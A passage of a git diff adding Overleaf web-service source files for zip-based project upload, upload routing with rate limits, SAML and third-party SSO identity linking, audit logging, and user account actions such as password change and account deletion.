+const ProjectDeleter = require('../Project/ProjectDeleter') +const TpdsProjectFlusher = require('../ThirdPartyDataStore/TpdsProjectFlusher') +const logger = require('@overleaf/logger') +const OError = require('@overleaf/o-error') + +module.exports = { + createProjectFromZipArchive: callbackify(createProjectFromZipArchive), + createProjectFromZipArchiveWithName: callbackify( + createProjectFromZipArchiveWithName + ), + promises: { + createProjectFromZipArchive, + createProjectFromZipArchiveWithName, + }, +} + +async function createProjectFromZipArchive(ownerId, defaultName, zipPath) { + const contentsPath = await _extractZip(zipPath) + const { path, content } = + await ProjectRootDocManager.promises.findRootDocFileFromDirectory( + contentsPath + ) + + const projectName = + DocumentHelper.getTitleFromTexContent(content || '') || defaultName + const uniqueName = await _generateUniqueName(ownerId, projectName) + const project = await ProjectCreationHandler.promises.createBlankProject( + ownerId, + uniqueName + ) + try { + await _initializeProjectWithZipContents(ownerId, project, contentsPath) + + if (path) { + await ProjectRootDocManager.promises.setRootDocFromName(project._id, path) + } + } catch (err) { + // no need to wait for the cleanup here + ProjectDeleter.promises + .deleteProject(project._id) + .catch(err => + logger.error( + { err, projectId: project._id }, + 'there was an error cleaning up project after importing a zip failed' + ) + ) + throw err + } + await fs.promises.rm(contentsPath, { recursive: true, force: true }) + return project +} + +async function createProjectFromZipArchiveWithName( + ownerId, + proposedName, + zipPath, + attributes = {} +) { + const contentsPath = await _extractZip(zipPath) + const uniqueName = await _generateUniqueName(ownerId, proposedName) + const project = await ProjectCreationHandler.promises.createBlankProject( + ownerId, + uniqueName, + attributes + ) + + try { + await _initializeProjectWithZipContents(ownerId, project, contentsPath) + await ProjectRootDocManager.promises.setRootDocAutomatically(project._id) + } catch (err) { + // no need to wait for the cleanup here + ProjectDeleter.promises + .deleteProject(project._id) + .catch(err => + logger.error( + { err, projectId: project._id }, + 'there was an error cleaning up project after importing a zip failed' + ) + ) + throw err + } + await fs.promises.rm(contentsPath, { recursive: true, force: true }) + return project +} + +async function _extractZip(zipPath) { + const destination = Path.join( + Path.dirname(zipPath), + `${Path.basename(zipPath, '.zip')}-${Date.now()}` + ) + await ArchiveManager.promises.extractZipArchive(zipPath, destination) + return destination +} + +async function _generateUniqueName(ownerId, originalName) { + const fixedName = ProjectDetailsHandler.fixProjectName(originalName) + const uniqueName = await ProjectDetailsHandler.promises.generateUniqueName( + ownerId, + fixedName + ) + return uniqueName +} + +async function _initializeProjectWithZipContents( + ownerId, + project, + contentsPath +) { + const topLevelDir = + await ArchiveManager.promises.findTopLevelDirectory(contentsPath) + const importEntries = + await FileSystemImportManager.promises.importDir(topLevelDir) + const { fileEntries, docEntries } = await _createEntriesFromImports( + project, + importEntries + ) + const projectVersion = + await ProjectEntityMongoUpdateHandler.promises.createNewFolderStructure( + project._id, + docEntries, + fileEntries + ) + await _notifyDocumentUpdater(project, ownerId, { + 
newFiles: fileEntries, + newDocs: docEntries, + newProject: { version: projectVersion }, + }) + await TpdsProjectFlusher.promises.flushProjectToTpds(project._id) +} + +async function _createEntriesFromImports(project, importEntries) { + const fileEntries = [] + const docEntries = [] + for (const importEntry of importEntries) { + switch (importEntry.type) { + case 'doc': { + const docEntry = await _createDoc( + project, + importEntry.projectPath, + importEntry.lines + ) + docEntries.push(docEntry) + break + } + case 'file': { + const fileEntry = await _createFile( + project, + importEntry.projectPath, + importEntry.fsPath + ) + fileEntries.push(fileEntry) + break + } + default: { + throw new Error(`Invalid import type: ${importEntry.type}`) + } + } + } + return { fileEntries, docEntries } +} + +async function _createDoc(project, projectPath, docLines) { + const projectId = project._id + const docName = Path.basename(projectPath) + const doc = new Doc({ name: docName }) + await DocstoreManager.promises.updateDoc( + projectId.toString(), + doc._id.toString(), + docLines, + 0, + {} + ) + return { doc, path: projectPath, docLines: docLines.join('\n') } +} + +async function _createFile(project, projectPath, fsPath) { + const projectId = project._id + const historyId = project.overleaf?.history?.id + if (!historyId) { + throw new OError('missing history id') + } + const fileName = Path.basename(projectPath) + const { createdBlob, fileRef, url } = + await FileStoreHandler.promises.uploadFileFromDiskWithHistoryId( + projectId, + historyId, + { name: fileName }, + fsPath + ) + return { createdBlob, file: fileRef, path: projectPath, url } +} + +async function _notifyDocumentUpdater(project, userId, changes) { + const projectHistoryId = + project.overleaf && project.overleaf.history && project.overleaf.history.id + await DocumentUpdaterHandler.promises.updateProjectStructure( + project._id, + projectHistoryId, + userId, + changes, + null + ) +} diff --git a/services/web/app/src/Features/Uploads/UploadsRouter.mjs b/services/web/app/src/Features/Uploads/UploadsRouter.mjs new file mode 100644 index 0000000..17ff5af --- /dev/null +++ b/services/web/app/src/Features/Uploads/UploadsRouter.mjs @@ -0,0 +1,55 @@ +import AuthorizationMiddleware from '../Authorization/AuthorizationMiddleware.js' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import ProjectUploadController from './ProjectUploadController.mjs' +import { RateLimiter } from '../../infrastructure/RateLimiter.js' +import RateLimiterMiddleware from '../Security/RateLimiterMiddleware.js' +import Settings from '@overleaf/settings' + +const rateLimiters = { + projectUpload: new RateLimiter('project-upload', { + points: 20, + duration: 60, + }), + fileUpload: new RateLimiter('file-upload', { + points: 500, + duration: 60 * 15, + }), +} + +export default { + apply(webRouter) { + webRouter.post( + '/project/new/upload', + AuthenticationController.requireLogin(), + RateLimiterMiddleware.rateLimit(rateLimiters.projectUpload), + ProjectUploadController.multerMiddleware, + ProjectUploadController.uploadProject + ) + + const fileUploadEndpoint = '/Project/:Project_id/upload' + const fileUploadRateLimit = RateLimiterMiddleware.rateLimit( + rateLimiters.fileUpload, + { + params: ['Project_id'], + } + ) + if (Settings.allowAnonymousReadAndWriteSharing) { + webRouter.post( + fileUploadEndpoint, + fileUploadRateLimit, + AuthorizationMiddleware.ensureUserCanWriteProjectContent, + ProjectUploadController.multerMiddleware, + 
ProjectUploadController.uploadFile
+      )
+    } else {
+      webRouter.post(
+        fileUploadEndpoint,
+        fileUploadRateLimit,
+        AuthenticationController.requireLogin(),
+        AuthorizationMiddleware.ensureUserCanWriteProjectContent,
+        ProjectUploadController.multerMiddleware,
+        ProjectUploadController.uploadFile
+      )
+    }
+  },
+}
diff --git a/services/web/app/src/Features/User/SAMLIdentityManager.js b/services/web/app/src/Features/User/SAMLIdentityManager.js
new file mode 100644
index 0000000..dc790c5
--- /dev/null
+++ b/services/web/app/src/Features/User/SAMLIdentityManager.js
@@ -0,0 +1,468 @@
+const { ObjectId } = require('mongodb-legacy')
+const EmailHandler = require('../Email/EmailHandler')
+const Errors = require('../Errors/Errors')
+const InstitutionsAPI = require('../Institutions/InstitutionsAPI')
+const NotificationsBuilder = require('../Notifications/NotificationsBuilder')
+const OError = require('@overleaf/o-error')
+const SubscriptionLocator = require('../Subscription/SubscriptionLocator')
+const UserAuditLogHandler = require('../User/UserAuditLogHandler')
+const UserGetter = require('../User/UserGetter')
+const UserUpdater = require('../User/UserUpdater')
+const logger = require('@overleaf/logger')
+const { User } = require('../../models/User')
+const { promiseMapWithLimit } = require('@overleaf/promise-utils')
+
+async function _addAuditLogEntry(operation, userId, auditLog, extraInfo) {
+  await UserAuditLogHandler.promises.addEntry(
+    userId,
+    operation,
+    auditLog.initiatorId,
+    auditLog.ipAddress,
+    extraInfo
+  )
+}
+
+async function _ensureCanAddIdentifier(userId, institutionEmail, providerId) {
+  const userWithProvider = await UserGetter.promises.getUser(
+    { _id: new ObjectId(userId), 'samlIdentifiers.providerId': providerId },
+    { _id: 1 }
+  )
+
+  if (userWithProvider) {
+    throw new Errors.SAMLAlreadyLinkedError()
+  }
+
+  const userWithEmail =
+    await UserGetter.promises.getUserByAnyEmail(institutionEmail)
+
+  if (!userWithEmail) {
+    // email doesn't exist; all good
+    return
+  }
+
+  const emailBelongToUser = userWithEmail._id.toString() === userId.toString()
+  const existingEmailData = userWithEmail.emails.find(
+    emailData => emailData.email === institutionEmail
+  )
+
+  if (!emailBelongToUser && existingEmailData.samlProviderId) {
+    // email exists and is already linked to an institution;
+    // return to the requesting page with an error
+    throw new Errors.SAMLIdentityExistsError()
+  }
+
+  if (!emailBelongToUser) {
+    // email exists but is not linked, so redirect to the linking page,
+    // which will tell this user to log out to link
+    throw new Errors.EmailExistsError()
+  }
+
+  // email belongs to user. 
Make sure it's already affiliated with the provider + const fullEmails = await UserGetter.promises.getUserFullEmails( + userWithEmail._id + ) + const existingFullEmailData = fullEmails.find( + emailData => emailData.email === institutionEmail + ) + + if (!existingFullEmailData.affiliation) { + throw new Errors.SAMLEmailNotAffiliatedError() + } + + if ( + existingFullEmailData.affiliation.institution.id.toString() !== providerId + ) { + throw new Errors.SAMLEmailAffiliatedWithAnotherInstitutionError() + } +} + +async function _addIdentifier( + userId, + externalUserId, + providerId, + hasEntitlement, + institutionEmail, + providerName, + auditLog, + userIdAttribute +) { + providerId = providerId.toString() + + await _ensureCanAddIdentifier(userId, institutionEmail, providerId) + + const auditLogInfo = { + institutionEmail, + providerId, + providerName, + userIdAttribute, + externalUserId, + } + + await _addAuditLogEntry( + 'link-institution-sso', + userId, + auditLog, + auditLogInfo + ) + + hasEntitlement = !!hasEntitlement + const query = { + _id: userId, + 'samlIdentifiers.providerId': { + $ne: providerId, + }, + } + + const update = { + $push: { + samlIdentifiers: { + hasEntitlement, + externalUserId, + providerId, + userIdAttribute, + }, + }, + } + + try { + // update v2 user record + const updatedUser = await User.findOneAndUpdate(query, update, { + new: true, + }).exec() + if (!updatedUser) { + throw new OError('No update while linking user') + } + return updatedUser + } catch (err) { + if (err.code === 11000) { + throw new Errors.SAMLIdentityExistsError() + } else { + throw OError.tag(err) + } + } +} + +async function _addInstitutionEmail(userId, email, providerId, auditLog) { + const user = await UserGetter.promises.getUser(userId) + const query = { + _id: userId, + 'emails.email': email, + } + const update = { + $set: { + 'emails.$.samlProviderId': providerId.toString(), + }, + } + if (user == null) { + throw new Errors.NotFoundError('user not found') + } + const emailAlreadyAssociated = user.emails.find(e => e.email === email) + if (emailAlreadyAssociated) { + await UserUpdater.promises.updateUser(query, update) + } else { + await UserUpdater.promises.addEmailAddress( + user._id, + email, + { university: { id: providerId }, rejectIfBlocklisted: true }, + auditLog + ) + await UserUpdater.promises.updateUser(query, update) + } +} + +async function _sendLinkedEmail(userId, providerName, institutionEmail) { + const user = await UserGetter.promises.getUser(userId, { email: 1 }) + const emailOptions = { + to: user.email, + actionDescribed: `an Institutional SSO account at ${providerName} was linked to your account ${user.email}`, + action: 'institutional SSO account linked', + message: [ + `<span style="display:inline-block;padding: 0 20px;width:100%;">Linked: <br/><b>${institutionEmail}</b></span>`, + ], + } + EmailHandler.sendEmail('securityAlert', emailOptions, error => { + if (error) { + logger.warn({ err: error }) + } + }) +} + +function _sendUnlinkedEmail(primaryEmail, providerName, institutionEmail) { + const emailOptions = { + to: primaryEmail, + actionDescribed: `an Institutional SSO account at ${providerName} was unlinked from your account ${primaryEmail}`, + action: 'institutional SSO account no longer linked', + message: [ + `<span style="display:inline-block;padding: 0 20px;width:100%;">No longer linked: <br/><b>${institutionEmail}</b></span>`, + ], + } + EmailHandler.sendEmail('securityAlert', emailOptions, error => { + if (error) { + logger.warn({ err: error }) + } + }) 
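+  // Note: both security-alert emails are fire-and-forget; a send failure is
+  // logged as a warning but never blocks the link/unlink operation itself.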
+} + +async function getUser(providerId, externalUserId, userIdAttribute) { + if (!providerId || !externalUserId || !userIdAttribute) { + throw new Error( + `invalid arguments: providerId: ${providerId}, externalUserId: ${externalUserId}, userIdAttribute: ${userIdAttribute}` + ) + } + const user = await User.findOne({ + 'samlIdentifiers.externalUserId': externalUserId.toString(), + 'samlIdentifiers.providerId': providerId.toString(), + 'samlIdentifiers.userIdAttribute': userIdAttribute.toString(), + }).exec() + + return user +} + +async function redundantSubscription(userId, providerId, providerName) { + const subscription = + await SubscriptionLocator.promises.getUserIndividualSubscription(userId) + + if (subscription && !subscription.groupPlan) { + await NotificationsBuilder.promises + .redundantPersonalSubscription( + { + institutionId: providerId, + institutionName: providerName, + }, + { _id: userId } + ) + .create() + } +} + +async function linkAccounts(userId, samlData, auditLog) { + const { + externalUserId, + institutionEmail, + universityId: providerId, + universityName: providerName, + hasEntitlement, + userIdAttribute, + } = samlData + + if (!externalUserId || !institutionEmail || !providerId || !userIdAttribute) { + throw new Error( + `missing data when linking institution SSO: ${JSON.stringify(samlData)}` + ) + } + + await _addIdentifier( + userId, + externalUserId, + providerId, + hasEntitlement, + institutionEmail, + providerName, + auditLog, + userIdAttribute + ) + try { + await _addInstitutionEmail(userId, institutionEmail, providerId, auditLog) + } catch (error) { + await _removeIdentifier(userId, providerId) + throw error + } + await UserUpdater.promises.confirmEmail(userId, institutionEmail, { + entitlement: hasEntitlement, + }) // will set confirmedAt if not set, and will always update reconfirmedAt + await _sendLinkedEmail(userId, providerName, institutionEmail) +} + +async function unlinkAccounts( + userId, + institutionEmail, + primaryEmail, + providerId, + providerName, + auditLog +) { + providerId = providerId.toString() + + await _addAuditLogEntry('unlink-institution-sso', userId, auditLog, { + institutionEmail, + providerId, + providerName, + }) + // update v2 user + await _removeIdentifier(userId, providerId) + // update v1 affiliations record + await InstitutionsAPI.promises.removeEntitlement(userId, institutionEmail) + // send email + _sendUnlinkedEmail(primaryEmail, providerName, institutionEmail) +} + +async function _removeIdentifier(userId, providerId) { + providerId = providerId.toString() + + const query = { + _id: userId, + } + const update = { + $pull: { + samlIdentifiers: { + providerId, + }, + }, + } + await User.updateOne(query, update).exec() +} + +async function updateEntitlement( + userId, + institutionEmail, + providerId, + hasEntitlement +) { + providerId = providerId.toString() + hasEntitlement = !!hasEntitlement + const query = { + _id: userId, + 'samlIdentifiers.providerId': providerId.toString(), + } + const update = { + $set: { + 'samlIdentifiers.$.hasEntitlement': hasEntitlement, + }, + } + // update v2 user + await User.updateOne(query, update).exec() +} + +function entitlementAttributeMatches(entitlementAttribute, entitlementMatcher) { + if (Array.isArray(entitlementAttribute)) { + entitlementAttribute = entitlementAttribute.join(' ') + } + if ( + typeof entitlementAttribute !== 'string' || + typeof entitlementMatcher !== 'string' + ) { + return false + } + try { + const entitlementRegExp = new RegExp(entitlementMatcher) + return 
!!entitlementAttribute.match(entitlementRegExp) + } catch (err) { + logger.error({ err }, 'Invalid SAML entitlement matcher') + // this is likely caused by an invalid regex in the matcher string + // log the error but do not bubble so that user can still sign in + // even if they don't have the entitlement + return false + } +} + +function userHasEntitlement(user, providerId) { + providerId = providerId.toString() + if (!user || !Array.isArray(user.samlIdentifiers)) { + return false + } + for (const samlIdentifier of user.samlIdentifiers) { + if (providerId && samlIdentifier.providerId !== providerId) { + continue + } + if (samlIdentifier.hasEntitlement) { + return true + } + } + return false +} + +async function migrateIdentifier( + userId, + externalUserId, + providerId, + hasEntitlement, + institutionEmail, + providerName, + auditLog, + userIdAttribute +) { + providerId = providerId.toString() + + const query = { + _id: userId, + 'samlIdentifiers.providerId': providerId, + } + + const update = { + $set: { + 'samlIdentifiers.$.externalUserId': externalUserId, + 'samlIdentifiers.$.userIdAttribute': userIdAttribute, + }, + } + await User.updateOne(query, update).exec() + + const auditLogInfo = { + institutionEmail, + providerId, + providerName, + userIdAttribute, + } + + await _addAuditLogEntry( + 'migrate-institution-sso-id', + userId, + auditLog, + auditLogInfo + ) +} + +async function unlinkNotMigrated(userId, providerId, providerName, auditLog) { + providerId = providerId.toString() + + const query = { + _id: userId, + 'emails.samlProviderId': providerId, + } + const update = { + $pull: { + samlIdentifiers: { + providerId, + }, + }, + $unset: { + 'emails.$.samlProviderId': 1, + }, + } + + const originalDoc = await User.findOneAndUpdate(query, update).exec() + + // should only be 1 + const linkedEmails = originalDoc.emails.filter(email => { + return email.samlProviderId === providerId + }) + + const auditLogInfo = { + providerId, + providerName, + } + + await _addAuditLogEntry( + 'unlink-institution-sso-not-migrated', + userId, + auditLog, + auditLogInfo + ) + + await promiseMapWithLimit(10, linkedEmails, async emailData => { + await InstitutionsAPI.promises.removeEntitlement(userId, emailData.email) + }) +} + +const SAMLIdentityManager = { + entitlementAttributeMatches, + getUser, + linkAccounts, + migrateIdentifier, + redundantSubscription, + unlinkAccounts, + unlinkNotMigrated, + updateEntitlement, + userHasEntitlement, +} + +module.exports = SAMLIdentityManager diff --git a/services/web/app/src/Features/User/ThirdPartyIdentityManager.js b/services/web/app/src/Features/User/ThirdPartyIdentityManager.js new file mode 100644 index 0000000..63622dc --- /dev/null +++ b/services/web/app/src/Features/User/ThirdPartyIdentityManager.js @@ -0,0 +1,217 @@ +const UserAuditLogHandler = require('../../../../app/src/Features/User/UserAuditLogHandler') +const EmailHandler = require('../../../../app/src/Features/Email/EmailHandler') +const EmailOptionsHelper = require('../../../../app/src/Features/Email/EmailOptionsHelper') +const Errors = require('../Errors/Errors') +const _ = require('lodash') +const logger = require('@overleaf/logger') +const settings = require('@overleaf/settings') +const { User } = require('../../../../app/src/models/User') +const { callbackify } = require('@overleaf/promise-utils') +const OError = require('@overleaf/o-error') + +const oauthProviders = settings.oauthProviders || {} + +async function getUser(providerId, externalUserId) { + if (providerId == null || 
externalUserId == null) { + throw new OError('invalid SSO arguments', { + externalUserId, + providerId, + }) + } + + const query = _getUserQuery(providerId, externalUserId) + const user = await User.findOne(query).exec() + if (!user) { + throw new Errors.ThirdPartyUserNotFoundError() + } + return user +} + +async function login(providerId, externalUserId, externalData) { + const user = await ThirdPartyIdentityManager.promises.getUser( + providerId, + externalUserId + ) + if (!externalData) { + return user + } + const query = _getUserQuery(providerId, externalUserId) + const update = _thirdPartyIdentifierUpdate( + user, + providerId, + externalUserId, + externalData + ) + return await User.findOneAndUpdate(query, update, { new: true }).exec() +} + +async function link( + userId, + providerId, + externalUserId, + externalData, + auditLog, + retry +) { + const accountLinked = true + if (!oauthProviders[providerId]) { + throw new Error('Not a valid provider') + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'link-sso', + auditLog.initiatorId, + auditLog.ipAddress, + { + providerId, + } + ) + + const query = { + _id: userId, + 'thirdPartyIdentifiers.providerId': { + $ne: providerId, + }, + } + const update = { + $push: { + thirdPartyIdentifiers: { + externalUserId, + externalData, + providerId, + }, + }, + } + // add new tpi only if an entry for the provider does not exist + // projection includes thirdPartyIdentifiers for tests + let res + try { + res = await User.findOneAndUpdate(query, update, { new: 1 }).exec() + } catch (err) { + if (err.code === 11000) { + throw new Errors.ThirdPartyIdentityExistsError({ + info: { externalUserId }, + }) + } + throw err + } + + if (res) { + _sendSecurityAlert(accountLinked, providerId, res, userId) + return res + } + + if (retry) { + // if already retried then throw error + throw new Error('update failed') + } + + // attempt to clear existing entry then retry + await ThirdPartyIdentityManager.promises.unlink(userId, providerId, auditLog) + return await ThirdPartyIdentityManager.promises.link( + userId, + providerId, + externalUserId, + externalData, + auditLog, + true + ) +} + +async function unlink(userId, providerId, auditLog) { + const accountLinked = false + if (!oauthProviders[providerId]) { + throw new Error('Not a valid provider') + } + + await UserAuditLogHandler.promises.addEntry( + userId, + 'unlink-sso', + auditLog.initiatorId, + auditLog.ipAddress, + { + ...(auditLog.extraInfo || {}), + providerId, + } + ) + + const query = { + _id: userId, + } + const update = { + $pull: { + thirdPartyIdentifiers: { + providerId, + }, + }, + } + // projection includes thirdPartyIdentifiers for tests + const res = await User.findOneAndUpdate(query, update, { new: 1 }) + if (!res) { + throw new Error('update failed') + } + _sendSecurityAlert(accountLinked, providerId, res, userId) + return res +} + +function _getUserQuery(providerId, externalUserId) { + externalUserId = externalUserId.toString() + providerId = providerId.toString() + const query = { + 'thirdPartyIdentifiers.externalUserId': externalUserId, + 'thirdPartyIdentifiers.providerId': providerId, + } + return query +} + +function _sendSecurityAlert(accountLinked, providerId, user, userId) { + const providerName = oauthProviders[providerId].name + const emailOptions = EmailOptionsHelper.linkOrUnlink( + accountLinked, + providerName, + user.email + ) + EmailHandler.promises + .sendEmail('securityAlert', emailOptions) + .catch(error => { + logger.error( + { err: error, userId }, + `could 
not send security alert email when ${emailOptions.action.toLowerCase()}` + ) + }) +} + +function _thirdPartyIdentifierUpdate( + user, + providerId, + externalUserId, + externalData +) { + providerId = providerId.toString() + // get third party identifier object from array + const thirdPartyIdentifier = user.thirdPartyIdentifiers.find( + tpi => + tpi.externalUserId === externalUserId && tpi.providerId === providerId + ) + // do recursive merge of new data over existing data + _.merge(thirdPartyIdentifier.externalData, externalData) + const update = { 'thirdPartyIdentifiers.$': thirdPartyIdentifier } + return update +} + +const ThirdPartyIdentityManager = { + getUser: callbackify(getUser), + login: callbackify(login), + link: callbackify(link), + unlink: callbackify(unlink), +} + +ThirdPartyIdentityManager.promises = { + getUser, + login, + link, + unlink, +} + +module.exports = ThirdPartyIdentityManager diff --git a/services/web/app/src/Features/User/UserAuditLogHandler.js b/services/web/app/src/Features/User/UserAuditLogHandler.js new file mode 100644 index 0000000..b1d4043 --- /dev/null +++ b/services/web/app/src/Features/User/UserAuditLogHandler.js @@ -0,0 +1,80 @@ +const OError = require('@overleaf/o-error') +const { UserAuditLogEntry } = require('../../models/UserAuditLogEntry') +const { callbackify } = require('util') + +function _canHaveNoIpAddressId(operation, info) { + if (operation === 'join-group-subscription') return true + if (operation === 'leave-group-subscription') return true + if (operation === 'must-reset-password-set') return true + if (operation === 'remove-email' && info.script) return true + if (operation === 'release-managed-user' && info.script) return true + return false +} + +function _canHaveNoInitiatorId(operation, info) { + if (operation === 'reset-password') return true + if (operation === 'unlink-sso' && info.providerId === 'collabratec') + return true + if (operation === 'unlink-sso' && info.script === true) return true + if (operation === 'unlink-institution-sso-not-migrated') return true + if (operation === 'remove-email' && info.script) return true + if (operation === 'join-group-subscription') return true + if (operation === 'leave-group-subscription') return true + if (operation === 'must-reset-password-set') return true + if (operation === 'must-reset-password-unset') return true + if (operation === 'account-suspension' && info.script) return true + if (operation === 'release-managed-user' && info.script) return true +} + +/** + * Add an audit log entry + * + * The entry should include at least the following fields: + * + * - userId: the user on behalf of whom the operation was performed + * - operation: a string identifying the type of operation + * - initiatorId: who performed the operation + * - ipAddress: the IP address of the initiator + * - info: an object detailing what happened + */ +async function addEntry(userId, operation, initiatorId, ipAddress, info = {}) { + if (!operation) { + throw new OError('missing operation for audit log', { + initiatorId, + ipAddress, + }) + } + + if (!ipAddress && !_canHaveNoIpAddressId(operation, info)) { + throw new OError('missing ipAddress for audit log', { + operation, + initiatorId, + }) + } + + if (!initiatorId && !_canHaveNoInitiatorId(operation, info)) { + throw new OError('missing initiatorId for audit log', { + operation, + ipAddress, + }) + } + + const entry = { + userId, + operation, + initiatorId, + info, + ipAddress, + } + + await UserAuditLogEntry.create(entry) +} + +const UserAuditLogHandler = { + 
addEntry: callbackify(addEntry), + promises: { + addEntry, + }, +} + +module.exports = UserAuditLogHandler diff --git a/services/web/app/src/Features/User/UserController.js b/services/web/app/src/Features/User/UserController.js new file mode 100644 index 0000000..e4186d3 --- /dev/null +++ b/services/web/app/src/Features/User/UserController.js @@ -0,0 +1,518 @@ +const UserHandler = require('./UserHandler') +const UserDeleter = require('./UserDeleter') +const UserGetter = require('./UserGetter') +const { User } = require('../../models/User') +const NewsletterManager = require('../Newsletter/NewsletterManager') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const AuthenticationManager = require('../Authentication/AuthenticationManager') +const SessionManager = require('../Authentication/SessionManager') +const Features = require('../../infrastructure/Features') +const UserAuditLogHandler = require('./UserAuditLogHandler') +const UserSessionsManager = require('./UserSessionsManager') +const UserUpdater = require('./UserUpdater') +const Errors = require('../Errors/Errors') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const OError = require('@overleaf/o-error') +const EmailHandler = require('../Email/EmailHandler') +const UrlHelper = require('../Helpers/UrlHelper') +const { promisify } = require('util') +const { expressify } = require('@overleaf/promise-utils') +const { + acceptsJson, +} = require('../../infrastructure/RequestContentTypeDetection') +const Modules = require('../../infrastructure/Modules') +const OneTimeTokenHandler = require('../Security/OneTimeTokenHandler') + +async function _sendSecurityAlertClearedSessions(user) { + const emailOptions = { + to: user.email, + actionDescribed: `active sessions were cleared on your account ${user.email}`, + action: 'active sessions cleared', + } + try { + await EmailHandler.promises.sendEmail('securityAlert', emailOptions) + } catch (error) { + // log error when sending security alert email but do not pass back + logger.error( + { error, userId: user._id }, + 'could not send security alert email when sessions cleared' + ) + } +} + +function _sendSecurityAlertPasswordChanged(user) { + const emailOptions = { + to: user.email, + actionDescribed: `your password has been changed on your account ${user.email}`, + action: 'password changed', + } + EmailHandler.promises + .sendEmail('securityAlert', emailOptions) + .catch(error => { + // log error when sending security alert email but do not pass back + logger.error( + { error, userId: user._id }, + 'could not send security alert email when password changed' + ) + }) +} + +async function _ensureAffiliation(userId, emailData) { + if (emailData.samlProviderId) { + await UserUpdater.promises.confirmEmail(userId, emailData.email) + } else { + await UserUpdater.promises.addAffiliationForNewUser(userId, emailData.email) + } +} + +async function changePassword(req, res, next) { + metrics.inc('user.password-change') + const userId = SessionManager.getLoggedInUserId(req.session) + + const { user } = await AuthenticationManager.promises.authenticate( + { _id: userId }, + req.body.currentPassword, + null, + { enforceHIBPCheck: false } + ) + if (!user) { + return HttpErrorHandler.badRequest( + req, + res, + req.i18n.translate('password_change_old_password_wrong') + ) + } + + if (req.body.newPassword1 !== req.body.newPassword2) { + return HttpErrorHandler.badRequest( + req, + res, + req.i18n.translate('password_change_passwords_do_not_match') + ) + } + 
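  // [editor's note] Request-body sketch for this handler, derived from the
  // fields read above; the route path is an assumption, not part of this
  // commit:
  //
  //   await fetch('/user/password/update', {
  //     method: 'POST',
  //     headers: { 'Content-Type': 'application/json' },
  //     body: JSON.stringify({
  //       currentPassword: 'old-secret',
  //       newPassword1: 'new-secret',
  //       newPassword2: 'new-secret', // must equal newPassword1
  //     }),
  //   })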
+ try { + await AuthenticationManager.promises.setUserPassword( + user, + req.body.newPassword1 + ) + } catch (error) { + if (error.name === 'InvalidPasswordError') { + const message = AuthenticationManager.getMessageForInvalidPasswordError( + error, + req + ) + return res.status(400).json({ message }) + } else if (error.name === 'PasswordMustBeDifferentError') { + return HttpErrorHandler.badRequest( + req, + res, + req.i18n.translate('password_change_password_must_be_different') + ) + } else if (error.name === 'PasswordReusedError') { + return res.status(400).json({ + message: { + key: 'password-must-be-strong', + }, + }) + } else { + throw error + } + } + await UserAuditLogHandler.promises.addEntry( + user._id, + 'update-password', + user._id, + req.ip + ) + + // no need to wait, errors are logged and not passed back + _sendSecurityAlertPasswordChanged(user) + + await UserSessionsManager.promises.removeSessionsFromRedis( + user, + req.sessionID // remove all sessions except the current session + ) + + await OneTimeTokenHandler.promises.expireAllTokensForUser( + userId.toString(), + 'password' + ) + + return res.json({ + message: { + type: 'success', + email: user.email, + text: req.i18n.translate('password_change_successful'), + }, + }) +} + +async function clearSessions(req, res, next) { + metrics.inc('user.clear-sessions') + const userId = SessionManager.getLoggedInUserId(req.session) + const user = await UserGetter.promises.getUser(userId, { email: 1 }) + const sessions = await UserSessionsManager.promises.getAllUserSessions(user, [ + req.sessionID, + ]) + await UserAuditLogHandler.promises.addEntry( + user._id, + 'clear-sessions', + user._id, + req.ip, + { sessions } + ) + await UserSessionsManager.promises.removeSessionsFromRedis( + user, + req.sessionID // remove all sessions except the current session + ) + + await _sendSecurityAlertClearedSessions(user) + + res.sendStatus(201) +} + +async function ensureAffiliation(user) { + if (!Features.hasFeature('affiliations')) { + return + } + + const flaggedEmails = user.emails.filter(email => email.affiliationUnchecked) + if (flaggedEmails.length === 0) { + return + } + + if (flaggedEmails.length > 1) { + logger.error( + { userId: user._id }, + `Unexpected number of flagged emails: ${flaggedEmails.length}` + ) + } + + await _ensureAffiliation(user._id, flaggedEmails[0]) +} + +async function ensureAffiliationMiddleware(req, res, next) { + let user + if (!Features.hasFeature('affiliations') || !req.query.ensureAffiliation) { + return next() + } + const userId = SessionManager.getLoggedInUserId(req.session) + try { + user = await UserGetter.promises.getUser(userId) + } catch (error) { + throw new Errors.UserNotFoundError({ info: { userId } }) + } + // if the user does not have permission to add an affiliation, we skip this middleware + try { + req.assertPermission('add-affiliation') + } catch (error) { + if (error instanceof Errors.ForbiddenError) { + return next() + } + } + await ensureAffiliation(user) + return next() +} + +async function tryDeleteUser(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { password } = req.body + req.logger.addFields({ userId }) + + logger.debug({ userId }, 'trying to delete user account') + if (password == null || password === '') { + logger.err({ userId }, 'no password supplied for attempt to delete account') + return res.sendStatus(403) + } + + let user + try { + user = ( + await AuthenticationManager.promises.authenticate( + { _id: userId }, + password, + null, + { 
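        // [editor's note] Contract sketch for authenticate, inferred from
        // its use here and in changePassword above: it resolves an object
        // whose `user` is null when the password is wrong (hence the
        // `.user` destructuring and the `if (!user)` guard below), while
        // operational failures are thrown -- which is why the call sits in
        // a try/catch. enforceHIBPCheck presumably toggles a
        // HaveIBeenPwned-style compromised-password check; skipping it for
        // an account about to be deleted is an editorial inference, not
        // stated in this diff.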
enforceHIBPCheck: false } + ) + ).user + } catch (err) { + throw OError.tag( + err, + 'error authenticating during attempt to delete account', + { userId } + ) + } + + if (!user) { + logger.err({ userId }, 'auth failed during attempt to delete account') + return res.sendStatus(403) + } + + try { + await UserDeleter.promises.deleteUser(userId, { + deleterUser: user, + ipAddress: req.ip, + }) + } catch (err) { + const errorData = { + message: 'error while deleting user account', + info: { userId }, + } + if (err instanceof Errors.SubscriptionAdminDeletionError) { + // set info.public.error for JSON response so frontend can display + // a specific message + errorData.info.public = { + error: 'SubscriptionAdminDeletionError', + } + const error = OError.tag(err, errorData.message, errorData.info) + logger.warn({ error, req }, error.message) + return HttpErrorHandler.unprocessableEntity( + req, + res, + errorData.message, + errorData.info.public + ) + } else { + throw OError.tag(err, errorData.message, errorData.info) + } + } + + await Modules.promises.hooks.fire('tryDeleteV1Account', user) + + const sessionId = req.sessionID + + if (typeof req.logout === 'function') 